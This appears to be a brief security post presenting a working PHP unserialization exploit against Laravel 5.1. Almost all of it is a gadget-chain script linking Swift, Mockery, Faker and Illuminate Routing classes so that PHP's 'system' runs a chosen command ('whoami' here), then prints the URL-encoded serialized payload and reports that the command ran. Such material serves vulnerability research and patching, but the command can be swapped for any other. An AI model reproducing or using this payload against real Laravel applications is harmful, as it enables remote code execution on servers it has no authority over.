Laravel5.1 exists unserialization vulnerability

[Y4tacker]

First we add a route

here is the exp

<?php

namespace {

    class Swift_ByteStream_FileByteStream{
        private $_path;
        public function __construct(){
            $this->_path = new \Mockery\Generator\DefinedTargetClass();
        }
    }
    class Swift_ByteStream_TemporaryFileByteStream extends Swift_ByteStream_FileByteStream
    {


    }


}

namespace Mockery\Generator{
    class DefinedTargetClass
    {
        private $rfc ;
        public function __construct(){
            $this->rfc = new \Faker\ValidGenerator();
        }
    }
}

namespace Faker{
    class ValidGenerator
    {
        protected $generator;
        protected $validator = 'system';
        protected $maxRetries = 1;
        public function __construct(){
            $this->generator = new \Illuminate\Routing\Route();

        }
    }

}

namespace Illuminate\Routing{
    class Route
    {
        protected $action;
        public function __construct(){
            $this->action['as'] = 'whoami';
        }
        public function getName()
        {
            return isset($this->action['as']) ? $this->action['as'] : null;
        }
    }
}


namespace{
    $a = new Swift_ByteStream_TemporaryFileByteStream();
    echo urlencode(serialize($a));

}
?>

Successfully executed the command whoami